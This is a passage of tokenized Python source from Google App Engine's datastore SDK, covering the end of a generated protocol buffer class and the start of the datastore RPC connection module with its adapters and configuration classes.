( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . item_ ) != len ( x . item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . item_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSize ( ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSizePartial ( ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:11> : <EOL> self . add_item ( ) . TryMerge ( d ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kItemGroup = <NUM_LIT:1> <EOL> kItemvalue = <NUM_LIT:2> <EOL> kItemflags = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT:value>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STARTGROUP , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . FLOAT , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> if _extension_runtime : <EOL> pass <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> import collections <EOL> import copy <EOL> import functools <EOL> import logging <EOL> import os <EOL> from google . appengine . datastore import entity_pb <EOL> from google . appengine . api import api_base_pb <EOL> from google . appengine . api import apiproxy_rpc <EOL> from google . appengine . api import apiproxy_stub_map <EOL> from google . appengine . api import datastore_errors <EOL> from google . appengine . api import datastore_types <EOL> from google . appengine . api . app_identity import app_identity <EOL> from google . appengine . datastore import datastore_pb <EOL> from google . appengine . datastore import datastore_pbs <EOL> from google . appengine . datastore import datastore_v4_pb <EOL> from google . appengine . runtime import apiproxy_errors <EOL> _CLOUD_DATASTORE_ENABLED = datastore_pbs . _CLOUD_DATASTORE_ENABLED <EOL> if _CLOUD_DATASTORE_ENABLED : <EOL> from google . appengine . datastore . datastore_pbs import googledatastore <EOL> _MAX_ID_BATCH_SIZE = <NUM_LIT:1000> * <NUM_LIT:1000> * <NUM_LIT:1000> <EOL> _DATASTORE_V3 = '<STR_LIT>' <EOL> _DATASTORE_V4 = '<STR_LIT>' <EOL> _CLOUD_DATASTORE_V1 = '<STR_LIT>' <EOL> def _positional ( max_pos_args ) : <EOL> """<STR_LIT>""" <EOL> def positional_decorator ( wrapped ) : <EOL> @ functools . wraps ( wrapped ) <EOL> def positional_wrapper ( * args , ** kwds ) : <EOL> if len ( args ) > max_pos_args : <EOL> plural_s = '<STR_LIT>' <EOL> if max_pos_args != <NUM_LIT:1> : <EOL> plural_s = '<STR_LIT:s>' <EOL> raise TypeError ( <EOL> '<STR_LIT>' % <EOL> ( wrapped . __name__ , max_pos_args , plural_s , len ( args ) ) ) <EOL> return wrapped ( * args , ** kwds ) <EOL> return positional_wrapper <EOL> return positional_decorator <EOL> def _GetDatastoreType ( app = None ) : <EOL> """<STR_LIT>""" <EOL> current_app = datastore_types . ResolveAppId ( None ) <EOL> if app not in ( current_app , None ) : <EOL> return BaseConnection . UNKNOWN_DATASTORE <EOL> partition , _ , _ = app_identity . _ParseFullAppId ( current_app ) <EOL> if partition : <EOL> return BaseConnection . HIGH_REPLICATION_DATASTORE <EOL> return BaseConnection . MASTER_SLAVE_DATASTORE <EOL> class AbstractAdapter ( object ) : <EOL> """<STR_LIT>""" <EOL> _entity_converter = datastore_pbs . get_entity_converter ( ) <EOL> _query_converter = datastore_pbs . _QueryConverter ( _entity_converter ) <EOL> def __init__ ( self , id_resolver = None ) : <EOL> if id_resolver : <EOL> self . _entity_converter = datastore_pbs . get_entity_converter ( <EOL> id_resolver ) <EOL> self . _query_converter = datastore_pbs . _QueryConverter ( <EOL> self . _entity_converter ) <EOL> def get_entity_converter ( self ) : <EOL> return self . _entity_converter <EOL> def get_query_converter ( self ) : <EOL> return self . _query_converter <EOL> def pb_to_key ( self , pb ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def pb_v1_to_key ( self , pb ) : <EOL> """<STR_LIT>""" <EOL> v3_ref = entity_pb . Reference ( ) <EOL> self . _entity_converter . v1_to_v3_reference ( pb , v3_ref ) <EOL> return self . pb_to_key ( v3_ref ) <EOL> def pb_to_entity ( self , pb ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def pb_v1_to_entity ( self , pb , is_projection ) : <EOL> """<STR_LIT>""" <EOL> v3_entity = entity_pb . EntityProto ( ) <EOL> self . _entity_converter . v1_to_v3_entity ( pb , v3_entity , is_projection ) <EOL> return self . pb_to_entity ( v3_entity ) <EOL> def pb_v1_to_query_result ( self , pb , query_options ) : <EOL> """<STR_LIT>""" <EOL> if query_options . keys_only : <EOL> return self . pb_v1_to_key ( pb . key ) <EOL> else : <EOL> return self . pb_v1_to_entity ( pb , bool ( query_options . projection ) ) <EOL> def pb_to_index ( self , pb ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def pb_to_query_result ( self , pb , query_options ) : <EOL> """<STR_LIT>""" <EOL> if query_options . keys_only : <EOL> return self . pb_to_key ( pb . key ( ) ) <EOL> else : <EOL> return self . pb_to_entity ( pb ) <EOL> def key_to_pb ( self , key ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def key_to_pb_v1 ( self , key ) : <EOL> """<STR_LIT>""" <EOL> v3_ref = self . key_to_pb ( key ) <EOL> v1_key = googledatastore . Key ( ) <EOL> self . _entity_converter . v3_to_v1_key ( v3_ref , v1_key ) <EOL> return v1_key <EOL> def entity_to_pb ( self , entity ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def entity_to_pb_v1 ( self , entity ) : <EOL> """<STR_LIT>""" <EOL> v3_entity = self . entity_to_pb ( entity ) <EOL> v1_entity = googledatastore . Entity ( ) <EOL> self . _entity_converter . v3_to_v1_entity ( v3_entity , v1_entity ) <EOL> return v1_entity <EOL> def new_key_pb ( self ) : <EOL> """<STR_LIT>""" <EOL> return entity_pb . Reference ( ) <EOL> def new_entity_pb ( self ) : <EOL> """<STR_LIT>""" <EOL> return entity_pb . EntityProto ( ) <EOL> class IdentityAdapter ( AbstractAdapter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id_resolver = None ) : <EOL> super ( IdentityAdapter , self ) . __init__ ( id_resolver ) <EOL> def pb_to_key ( self , pb ) : <EOL> return pb <EOL> def pb_to_entity ( self , pb ) : <EOL> return pb <EOL> def key_to_pb ( self , key ) : <EOL> return key <EOL> def entity_to_pb ( self , entity ) : <EOL> return entity <EOL> def pb_to_index ( self , pb ) : <EOL> return pb <EOL> class ConfigOption ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , validator ) : <EOL> self . validator = validator <EOL> def __get__ ( self , obj , objtype ) : <EOL> if obj is None : <EOL> return self <EOL> return obj . _values . get ( self . validator . __name__ , None ) <EOL> def __set__ ( self , obj , value ) : <EOL> raise AttributeError ( '<STR_LIT>' % <EOL> ( self . validator . __name__ , ) ) <EOL> def __call__ ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> name = self . validator . __name__ <EOL> for config in args : <EOL> if isinstance ( config , ( type ( None ) , apiproxy_stub_map . UserRPC ) ) : <EOL> pass <EOL> elif not isinstance ( config , BaseConfiguration ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( config , ) ) <EOL> elif name in config . _values and self is config . _options [ name ] : <EOL> return config . _values [ name ] <EOL> return None <EOL> class _ConfigurationMetaClass ( type ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( metaclass , classname , bases , classDict ) : <EOL> if classname == '<STR_LIT>' : <EOL> return type . __new__ ( metaclass , classname , bases , classDict ) <EOL> if object in bases : <EOL> classDict [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> else : <EOL> classDict [ '<STR_LIT>' ] = [ ] <EOL> cls = type . __new__ ( metaclass , classname , bases , classDict ) <EOL> if object not in bases : <EOL> options = { } <EOL> for c in reversed ( cls . __mro__ ) : <EOL> if '<STR_LIT>' in c . __dict__ : <EOL> options . update ( c . __dict__ [ '<STR_LIT>' ] ) <EOL> cls . _options = options <EOL> for option , value in cls . __dict__ . iteritems ( ) : <EOL> if isinstance ( value , ConfigOption ) : <EOL> if cls . _options . has_key ( option ) : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( option , cls . __name__ ) ) <EOL> cls . _options [ option ] = value <EOL> value . _cls = cls <EOL> return cls <EOL> class BaseConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = _ConfigurationMetaClass <EOL> _options = { } <EOL> def __new__ ( cls , config = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if config is None : <EOL> pass <EOL> elif isinstance ( config , BaseConfiguration ) : <EOL> if cls is config . __class__ and config . __is_stronger ( ** kwargs ) : <EOL> return config <EOL> for key , value in config . _values . iteritems ( ) : <EOL> if issubclass ( cls , config . _options [ key ] . _cls ) : <EOL> kwargs . setdefault ( key , value ) <EOL> else : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( config , ) ) <EOL> obj = super ( BaseConfiguration , cls ) . __new__ ( cls ) <EOL> obj . _values = { } <EOL> for key , value in kwargs . iteritems ( ) : <EOL> if value is not None : <EOL> try : <EOL> config_option = obj . _options [ key ] <EOL> except KeyError , err : <EOL> raise TypeError ( '<STR_LIT>' % err ) <EOL> value = config_option . validator ( value ) <EOL> if value is not None : <EOL> obj . _values [ key ] = value <EOL> return obj <EOL> def __eq__ ( self , other ) : <EOL> if self is other : <EOL> return True <EOL> if not isinstance ( other , BaseConfiguration ) : <EOL> return NotImplemented <EOL> return self . _options == other . _options and self . _values == other . _values <EOL> def __ne__ ( self , other ) : <EOL> equal = self . __eq__ ( other ) <EOL> if equal is NotImplemented : <EOL> return equal <EOL> return not equal <EOL> def __hash__ ( self ) : <EOL> return ( hash ( frozenset ( self . _values . iteritems ( ) ) ) ^ <EOL> hash ( frozenset ( self . _options . iteritems ( ) ) ) ) <EOL> def __repr__ ( self ) : <EOL> args = [ ] <EOL> for key_value in sorted ( self . _values . iteritems ( ) ) : <EOL> args . append ( '<STR_LIT>' % key_value ) <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( args ) ) <EOL> def __is_stronger ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for key , value in kwargs . iteritems ( ) : <EOL> if key not in self . _values or value != self . _values [ key ] : <EOL> return False <EOL> return True <EOL> @ classmethod <EOL> def is_configuration ( cls , obj ) : <EOL> """<STR_LIT>""" <EOL> return isinstance ( obj , BaseConfiguration ) and obj . _is_configuration ( cls ) <EOL> def _is_configuration ( self , cls ) : <EOL> return isinstance ( self , cls ) <EOL> def merge ( self , config ) : <EOL> """<STR_LIT>""" <EOL> if config is None or config is self : <EOL> return self <EOL> if not ( isinstance ( config , _MergedConfiguration ) or <EOL> isinstance ( self , _MergedConfiguration ) ) : <EOL> if isinstance ( config , self . __class__ ) : <EOL> for key in self . _values : <EOL> if key not in config . _values : <EOL> break <EOL> else : <EOL> return config <EOL> if isinstance ( self , config . __class__ ) : <EOL> if self . __is_stronger ( ** config . _values ) : <EOL> return self <EOL> def _quick_merge ( obj ) : <EOL> obj . _values = self . _values . copy ( ) <EOL> obj . _values . update ( config . _values ) <EOL> return obj <EOL> if isinstance ( config , self . __class__ ) : <EOL> return _quick_merge ( type ( config ) ( ) ) <EOL> if isinstance ( self , config . __class__ ) : <EOL> return _quick_merge ( type ( self ) ( ) ) <EOL> return _MergedConfiguration ( config , self ) <EOL> def __getstate__ ( self ) : <EOL> return { '<STR_LIT>' : self . _values } <EOL> def __setstate__ ( self , state ) : <EOL> obj = self . __class__ ( ** state [ '<STR_LIT>' ] ) <EOL> self . _values = obj . _values <EOL> class _MergedConfiguration ( BaseConfiguration ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __new__ ( cls , * configs ) : <EOL> obj = super ( BaseConfiguration , cls ) . __new__ ( cls ) <EOL> obj . _configs = configs <EOL> obj . _options = { } <EOL> for config in configs : <EOL> for name , option in config . _options . iteritems ( ) : <EOL> if name in obj . _options : <EOL> if option is not obj . _options [ name ] : <EOL> error = ( "<STR_LIT>" % <EOL> ( name , option . _cls . __name__ , <EOL> obj . _options [ name ] . _cls . __name__ ) ) <EOL> raise datastore_errors . BadArgumentError ( error ) <EOL> obj . _options [ name ] = option <EOL> obj . _values = { } <EOL> for config in reversed ( configs ) : <EOL> for name , value in config . _values . iteritems ( ) : <EOL> obj . _values [ name ] = value <EOL> return obj <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , tuple ( self . _configs ) ) <EOL> def _is_configuration ( self , cls ) : <EOL> for config in self . _configs : <EOL> if config . _is_configuration ( cls ) : <EOL> return True <EOL> return False <EOL> def __getattr__ ( self , name ) : <EOL> if name in self . _options : <EOL> if name in self . _values : <EOL> return self . _values [ name ] <EOL> else : <EOL> return None <EOL> raise AttributeError ( "<STR_LIT>" % ( name , ) ) <EOL> def __getstate__ ( self ) : <EOL> return { '<STR_LIT>' : self . _configs } <EOL> def __setstate__ ( self , state ) : <EOL> obj = _MergedConfiguration ( * state [ '<STR_LIT>' ] ) <EOL> self . _values = obj . _values <EOL> self . _configs = obj . _configs <EOL> self . _options = obj . _options <EOL> class Configuration ( BaseConfiguration ) : <EOL> """<STR_LIT>""" <EOL> STRONG_CONSISTENCY = <NUM_LIT:0> <EOL> """<STR_LIT>""" <EOL> EVENTUAL_CONSISTENCY = <NUM_LIT:1> <EOL> """<STR_LIT>""" <EOL> APPLY_ALL_JOBS_CONSISTENCY = <NUM_LIT:2> <EOL> """<STR_LIT>""" <EOL> ALL_READ_POLICIES = frozenset ( ( STRONG_CONSISTENCY , <EOL> EVENTUAL_CONSISTENCY , <EOL> APPLY_ALL_JOBS_CONSISTENCY , <EOL> ) ) <EOL> @ ConfigOption <EOL> def deadline ( value ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , ( int , long , float ) ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( value , ) ) <EOL> if value <= <NUM_LIT:0> : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( value , ) ) <EOL> return value <EOL> @ ConfigOption <EOL> def on_completion ( value ) : <EOL> """<STR_LIT>""" <EOL> return value <EOL> @ ConfigOption <EOL> def read_policy ( value ) : <EOL> """<STR_LIT>""" <EOL> if value not in Configuration . ALL_READ_POLICIES : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( value , ) ) <EOL> return value <EOL> @ ConfigOption <EOL> def force_writes ( value ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , bool ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( value , ) ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_entity_groups_per_rpc ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_allocate_ids_keys ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_rpc_bytes ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_get_keys ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_put_entities ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> @ ConfigOption <EOL> def max_delete_keys ( value ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( value , ( int , long ) ) and value > <NUM_LIT:0> ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' ) <EOL> return value <EOL> _NOOP_SERVICE = '<STR_LIT>' <EOL> class _NoopRPC ( apiproxy_rpc . RPC ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( _NoopRPC , self ) . __init__ ( ) <EOL> def _WaitImpl ( self ) : <EOL> return True <EOL> def _MakeCallImpl ( self ) : <EOL> self . _state = apiproxy_rpc . RPC . FINISHING <EOL> class _NoopRPCStub ( object ) : <EOL> """<STR_LIT>""" <EOL> def CreateRPC ( self ) : <EOL> return _NoopRPC ( ) <EOL> class MultiRpc ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , rpcs , extra_hook = None ) : <EOL> """<STR_LIT>""" <EOL> self . __rpcs = self . flatten ( rpcs ) <EOL> self . __extra_hook = extra_hook <EOL> @ property <EOL> def rpcs ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . __rpcs ) <EOL> @ property <EOL> def state ( self ) : <EOL> """<STR_LIT>""" <EOL> lo = apiproxy_rpc . RPC . FINISHING <EOL> hi = apiproxy_rpc . RPC . IDLE <EOL> for rpc in self . __rpcs : <EOL> lo = min ( lo , rpc . state ) <EOL> hi = max ( hi , rpc . state ) <EOL> if lo == hi : <EOL> return lo <EOL> return apiproxy_rpc . RPC . RUNNING <EOL> def wait ( self ) : <EOL> """<STR_LIT>""" <EOL> apiproxy_stub_map . UserRPC . wait_all ( self . __rpcs ) <EOL> def check_success ( self ) : <EOL> """<STR_LIT>""" <EOL> self . wait ( ) <EOL> for rpc in self . __rpcs : <EOL> rpc . check_success ( ) <EOL> def get_result ( self ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . __rpcs ) == <NUM_LIT:1> : <EOL> results = self . __rpcs [ <NUM_LIT:0> ] . get_result ( ) <EOL> else : <EOL> results = [ ] <EOL> for rpc in self . __rpcs : <EOL> result = rpc . get_result ( ) <EOL> if isinstance ( result , list ) : <EOL> results . extend ( result ) <EOL> elif result is not None : <EOL> results . append ( result ) <EOL> if self . __extra_hook is not None : <EOL> results = self . __extra_hook ( results ) <EOL> return results <EOL> @ classmethod <EOL> def flatten ( cls , rpcs ) : <EOL> """<STR_LIT>""" <EOL> flat = [ ] <EOL> for rpc in rpcs : <EOL> if isinstance ( rpc , MultiRpc ) : <EOL> flat . extend ( rpc . __rpcs ) <EOL> else : <EOL> if not isinstance ( rpc , apiproxy_stub_map . UserRPC ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( rpc , ) ) <EOL> flat . append ( rpc ) <EOL> return flat <EOL> @ classmethod <EOL> def wait_any ( cls , rpcs ) : <EOL> """<STR_LIT>""" <EOL> return apiproxy_stub_map . UserRPC . wait_any ( cls . flatten ( rpcs ) ) <EOL> @ classmethod <EOL> def wait_all ( cls , rpcs ) : <EOL> """<STR_LIT>""" <EOL> apiproxy_stub_map . UserRPC . wait_all ( cls . flatten ( rpcs ) ) <EOL> class BaseConnection ( object ) : <EOL> """<STR_LIT>""" <EOL> UNKNOWN_DATASTORE = <NUM_LIT:0> <EOL> MASTER_SLAVE_DATASTORE = <NUM_LIT:1> <EOL> HIGH_REPLICATION_DATASTORE = <NUM_LIT:2> <EOL> __SUPPORTED_VERSIONS = frozenset ( ( _DATASTORE_V3 , <EOL> _CLOUD_DATASTORE_V1 ) ) <EOL> @ _positional ( <NUM_LIT:1> ) <EOL> def __init__ ( self , adapter = None , config = None , _api_version = _DATASTORE_V3 ) : <EOL> """<STR_LIT>""" <EOL> if adapter is None : <EOL> adapter = IdentityAdapter ( ) <EOL> if not isinstance ( adapter , AbstractAdapter ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( adapter , ) ) <EOL> self . __adapter = adapter <EOL> if config is None : <EOL> config = Configuration ( ) <EOL> elif not Configuration . is_configuration ( config ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( config , ) ) <EOL> self . __config = config <EOL> if _api_version not in self . __SUPPORTED_VERSIONS : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( _api_version , ) ) <EOL> if _api_version == _CLOUD_DATASTORE_V1 : <EOL> if not _CLOUD_DATASTORE_ENABLED : <EOL> raise datastore_errors . BadArgumentError ( <EOL> datastore_pbs . MISSING_CLOUD_DATASTORE_MESSAGE ) <EOL> apiproxy_stub_map . apiproxy . ReplaceStub ( _NOOP_SERVICE , _NoopRPCStub ( ) ) <EOL> self . _api_version = _api_version <EOL> self . __pending_rpcs = set ( ) <EOL> @ property <EOL> def adapter ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __adapter <EOL> @ property <EOL> def config ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __config <EOL> def _add_pending ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> assert not isinstance ( rpc , MultiRpc ) <EOL> self . __pending_rpcs . add ( rpc ) <EOL> def _remove_pending ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( rpc , MultiRpc ) : <EOL> for wrapped_rpc in rpc . _MultiRpc__rpcs : <EOL> self . _remove_pending ( wrapped_rpc ) <EOL> else : <EOL> try : <EOL> self . __pending_rpcs . remove ( rpc ) <EOL> except KeyError : <EOL> pass <EOL> def is_pending ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( rpc , MultiRpc ) : <EOL> for wrapped_rpc in rpc . _MultiRpc__rpcs : <EOL> if self . is_pending ( wrapped_rpc ) : <EOL> return True <EOL> return False <EOL> else : <EOL> return rpc in self . __pending_rpcs <EOL> def get_pending_rpcs ( self ) : <EOL> """<STR_LIT>""" <EOL> return set ( self . __pending_rpcs ) <EOL> def get_datastore_type ( self , app = None ) : <EOL> """<STR_LIT>""" <EOL> return _GetDatastoreType ( app ) <EOL> def wait_for_all_pending_rpcs ( self ) : <EOL> """<STR_LIT>""" <EOL> while self . __pending_rpcs : <EOL> try : <EOL> rpc = apiproxy_stub_map . UserRPC . wait_any ( self . __pending_rpcs ) <EOL> except Exception : <EOL> logging . info ( '<STR_LIT>' , <EOL> exc_info = True ) <EOL> continue <EOL> if rpc is None : <EOL> logging . debug ( '<STR_LIT>' ) <EOL> continue <EOL> assert rpc . state == apiproxy_rpc . RPC . FINISHING <EOL> if rpc in self . __pending_rpcs : <EOL> try : <EOL> self . check_rpc_success ( rpc ) <EOL> except Exception : <EOL> logging . info ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> exc_info = True ) <EOL> def _create_rpc ( self , config = None , service_name = None ) : <EOL> """<STR_LIT>""" <EOL> deadline = Configuration . deadline ( config , self . __config ) <EOL> on_completion = Configuration . on_completion ( config , self . __config ) <EOL> callback = None <EOL> if service_name is None : <EOL> service_name = self . _api_version <EOL> if on_completion is not None : <EOL> def callback ( ) : <EOL> return on_completion ( rpc ) <EOL> rpc = apiproxy_stub_map . UserRPC ( service_name , deadline , callback ) <EOL> return rpc <EOL> create_rpc = _create_rpc <EOL> def _set_request_read_policy ( self , request , config = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( config , apiproxy_stub_map . UserRPC ) : <EOL> read_policy = getattr ( config , '<STR_LIT>' , None ) <EOL> else : <EOL> read_policy = Configuration . read_policy ( config ) <EOL> if read_policy is None : <EOL> read_policy = self . __config . read_policy <EOL> if hasattr ( request , '<STR_LIT>' ) and hasattr ( request , '<STR_LIT>' ) : <EOL> if read_policy == Configuration . APPLY_ALL_JOBS_CONSISTENCY : <EOL> request . set_strong ( True ) <EOL> return True <EOL> elif read_policy == Configuration . EVENTUAL_CONSISTENCY : <EOL> request . set_strong ( False ) <EOL> request . set_failover_ms ( - <NUM_LIT:1> ) <EOL> return False <EOL> else : <EOL> return None <EOL> elif hasattr ( request , '<STR_LIT>' ) : <EOL> if read_policy == Configuration . EVENTUAL_CONSISTENCY : <EOL> request . read_options . read_consistency = ( <EOL> googledatastore . ReadOptions . EVENTUAL ) <EOL> return False <EOL> else : <EOL> return None <EOL> else : <EOL> raise datastore_errors . BadRequestError ( <EOL> '<STR_LIT>' ) <EOL> def _set_request_transaction ( self , request ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def _make_rpc_call ( self , config , method , request , response , <EOL> get_result_hook = None , user_data = None , <EOL> service_name = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( config , apiproxy_stub_map . UserRPC ) : <EOL> rpc = config <EOL> else : <EOL> rpc = self . _create_rpc ( config , service_name ) <EOL> rpc . make_call ( method , request , response , get_result_hook , user_data ) <EOL> self . _add_pending ( rpc ) <EOL> return rpc <EOL> make_rpc_call = _make_rpc_call <EOL> def check_rpc_success ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> rpc . wait ( ) <EOL> finally : <EOL> self . _remove_pending ( rpc ) <EOL> try : <EOL> rpc . check_success ( ) <EOL> except apiproxy_errors . ApplicationError , err : <EOL> raise _ToDatastoreError ( err ) <EOL> MAX_RPC_BYTES = <NUM_LIT> * <NUM_LIT> <EOL> MAX_GET_KEYS = <NUM_LIT:1000> <EOL> MAX_PUT_ENTITIES = <NUM_LIT> <EOL> MAX_DELETE_KEYS = <NUM_LIT> <EOL> MAX_ALLOCATE_IDS_KEYS = <NUM_LIT> <EOL> DEFAULT_MAX_ENTITY_GROUPS_PER_RPC = <NUM_LIT:10> <EOL> def __get_max_entity_groups_per_rpc ( self , config ) : <EOL> """<STR_LIT>""" 